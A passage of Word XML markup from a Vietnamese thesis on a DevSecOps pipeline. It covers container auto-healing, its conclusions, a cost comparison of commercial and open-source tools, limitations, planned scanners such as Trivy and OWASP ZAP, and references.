          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>http://localhost/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> mỗi 30 giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Container độc lập </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>willfarrell/autoheal</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lắng nghe các sự kiện qua Docker Unix Socket. Khi phát hiện container </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> chuyển sang trạng thái không khỏe mạnh quá 3 chu kỳ liên tiếp (tương đương 90 giây không phản hồi), Autoheal sẽ tự động kích hoạt lệnh khởi động lại container một cách độc lập mà không làm ảnh hưởng tới cơ sở dữ liệu hay hạ tầng giám sát, khôi phục dịch vụ về trạng thái sẵn sàng trong thời gian dưới 5 giây.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H1"/>
        <w:spacing w:before="280" w:after="320"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHƯƠNG 6: KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>6.1. Kết quả đạt được</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Nghiên cứu đã hoàn thành toàn diện các mục tiêu thực tế và kỹ thuật đã đề ra, mang lại những kết quả cụ thể:</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Xây dựng hoàn chỉnh chu trình DevSecOps tự động hóa 4 giai đoạn độc lập:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hiện thực hóa thành công quy trình tự động hóa khép kín từ khâu kiểm soát mã nguồn cục bộ tại máy lập trình viên, phân tích an ninh tĩnh đa chiều trên đám mây, kiểm thử tích hợp trên môi trường tạm thời, cho đến triển khai an toàn lên máy chủ Production thực tế có chứng chỉ SSL.</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Đưa việc kiểm tra an ninh về sớm ngay khi viết mã:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Rút ngắn thời gian kiểm định an ninh từ việc chờ đợi đến cuối kỳ xuống còn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>dưới 3 phút</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ngay trên giao diện GitHub Actions, giúp lập trình viên phát hiện và khắc phục sai phạm ngay tại thời điểm tạo Pull Request.</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Vận hành tách biệt độc lập giữa ứng dụng nghiệp vụ và hạ tầng giám sát:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chứng minh tính hiệu quả của mô hình phân tách hai nhánh Compose độc lập: việc nâng cấp mã nguồn ứng dụng web diễn ra nhanh chóng mà cụm công cụ giám sát và thu thập log vẫn duy trì hoạt động liên tục 24/7, xóa bỏ hoàn toàn điểm mù quan sát trong quá trình phát hành.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đóng góp bộ tài liệu kỹ thuật chuẩn công nghiệp:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cung cấp bộ hồ sơ đặc tả kiến trúc, quy trình chuyển giao liên tục (Deployment Runbook), quy tắc kiểm soát mã nguồn và kịch bản thực nghiệm an ninh toàn diện, tạo tiền đề cho việc chuẩn hóa quy trình DevOps tại các đơn vị phát triển phần mềm.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.1.1. Bảng phân tích tối ưu tổng chi phí sở hữu (TCO) và hiệu quả kinh tế</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Một trong những đóng góp thực tiễn quan trọng của đề tài là việc chứng minh một hệ thống doanh nghiệp vừa và nhỏ hoàn toàn có thể xây dựng nền tảng DevSecOps và Giám sát an ninh đạt chuẩn bảo vệ dữ liệu với chi phí phần mềm bằng 0, thông qua việc kết hợp các giải pháp nguồn mở tự do (FOSS):</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Hạng mục chi phí</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Giải pháp doanh nghiệp thương mại phổ biến</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Chi phí ước tính thương mại</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Giải pháp đề tài xây dựng (FOSS Stack)</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Chi phí giải pháp đề tài</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Mức tiết kiệm chi phí</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Kiểm định mã nguồn (SAST &amp; Quality Gate)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SonarQube Enterprise + Snyk Code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12.000 USD / năm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SonarQube Community + Semgrep OSS</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0 USD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Nguồn mở)</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Tiết kiệm 100%</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Kiểm soát chính sách (Policy-as-Code)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HashiCorp Sentinel / OPA Enterprise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6.000 USD / năm</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Tự xây dựng `ci/policy_guard.py`</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0 USD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Tự phát triển)</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Tiết kiệm 100%</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Thu thập &amp; Giám sát Log tập trung</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Datadog Log Management / Splunk Enterprise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15.000 USD / năm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Grafana Loki + Promtail 3.0</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0 USD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Tự vận hành)</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Tiết kiệm 100%</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Bảng điều khiển an ninh (SIEM / Dashboards)</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Splunk Enterprise Cloud / Elastic Security</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8.000 USD / năm</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Grafana OSS 11.0 (8 Panels tùy biến)</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0 USD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Nguồn mở)</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Tiết kiệm 100%</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Điều phối hạ tầng &amp; Tự phục hồi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Enterprise Container Platform / PagerDuty</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4.000 USD / năm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Docker Compose V2 + Autoheal</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0 USD</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Nguồn mở)</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Tiết kiệm 100%</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Chi phí máy chủ máy ảo (Hạ tầng phần cứng)</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Cloud Managed Cluster (AWS EKS / GCP GKE)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2.400 USD / năm</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Cloud VPS Ubuntu 24.04 LTS độc lập</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120 USD / năm</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Tiết kiệm &gt; 95%</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TỔNG CHI PHÍ SỞ HỮU (TCO / NĂM)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Bộ giải pháp thương mại khép kín</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 47.400 USD / năm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Toàn bộ hệ thống đề tài triển khai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 120 USD / năm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Tiết kiệm ~ 47.280 USD/năm (&gt; 99.7%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Ý nghĩa về quyền tự chủ và tuân thủ pháp lý:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Việc sử dụng các dịch vụ đám mây thương mại SaaS của nước ngoài tiềm ẩn rủi ro lớn về việc dữ liệu cá nhân của khách hàng và nhật ký truy vấn bị đẩy ra ngoài lãnh thổ Việt Nam. Khi tự vận hành cụm Loki, Grafana và MariaDB trên máy chủ riêng (VPS độc lập), doanh nghiệp nắm giữ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>100% quyền tự chủ dữ liệu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Data Sovereignty), bảo đảm dữ liệu cá nhân không bao giờ bị truyền tải trái phép ra nước ngoài, qua đó tuân thủ tuyệt đối quy định tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Điều 25 Nghị định 13/2023/NĐ-CP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> về điều kiện chuyển dữ liệu cá nhân ra nước ngoài.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>6.2. Hạn chế và hướng phát triển tiếp theo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hạn chế thực tế của hệ thống hiện tại:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Đường ống mới tập trung chủ yếu vào việc phân tích mã nguồn nội bộ qua SAST và kiểm thử nhịp tim chức năng qua Smoke Test, chưa tích hợp cơ chế tự động hóa phân tích thành phần phần mềm bên thứ ba qua SCA để phát hiện các lỗ hổng đã biết trong các thư viện PHP Composer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Chưa tích hợp công cụ kiểm thử an ninh động DAST để tự động kích hoạt các tải trọng khai thác giả lập vào môi trường thử nghiệm tạm thời trong quá trình chạy CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Kênh truyền dữ liệu nhật ký mới chỉ dừng lại ở việc hiển thị trực quan trên bảng điều khiển Grafana, chưa xây dựng cơ chế đẩy cảnh báo khẩn cấp tức thời tới thiết bị di động của kỹ sư trực vận hành khi có tấn công bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Định hướng phát triển tiếp theo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tích hợp công cụ quét phụ thuộc bên thứ ba qua Trivy:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tự động quét và phát hiện các lỗ hổng bảo mật trong các lớp hình ảnh nền của Dockerfile và các gói phụ thuộc Composer trước khi đóng gói lên GHCR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tự động hóa kiểm thử an ninh động với OWASP ZAP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kích hoạt tác tử quét động tự động thăm dò các điểm lỗi XSS, CSRF, cấu hình sai tiêu đề an ninh trên môi trường chạy thử tạm thời trong Stage 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet2"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Xây dựng hệ thống cảnh báo đa kênh tức thời qua Alertmanager:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cấu hình Grafana Alerting kết nối qua Webhook để tự động gửi thông báo vi phạm an ninh nghiêm trọng về kênh trao đổi kỹ thuật của nhóm trên Telegram hoặc Discord theo thời gian thực.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H0"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>TÀI LIỆU THAM KHẢO</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Bass, L., Weber, I., &amp; Zhu, L.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2015). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>DevOps: A Software Architect's Perspective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Addison-Wesley Professional.</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Boehm, B. W., &amp; Basili, V. R.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2001). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Software Defect Reduction Top 10 List</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. IEEE Computer, 34(1), 135-137.</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National Institute of Standards and Technology (NIST).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2022). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Secure Software Development Framework (SSDF) Version 1.1: Recommendations for Mitigating the Risk of Software Vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. NIST Special Publication 800-218.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Open Web Application Security Project (OWASP).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>OWASP Top 10: The Ten Most Critical Web Application Security Risks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. https://owasp.org/Top10/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>MITRE Corporation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2023). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Common Weakness Enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Sadowski, C., Aftandilian, E., Eagle, C., Miller-Cushon, L., &amp; Jaspan, C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2018). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Lessons from Building Static Analysis Tools at Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>. Communications of the ACM, 61(4), 58-66.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Semgrep Documentation.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2024). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
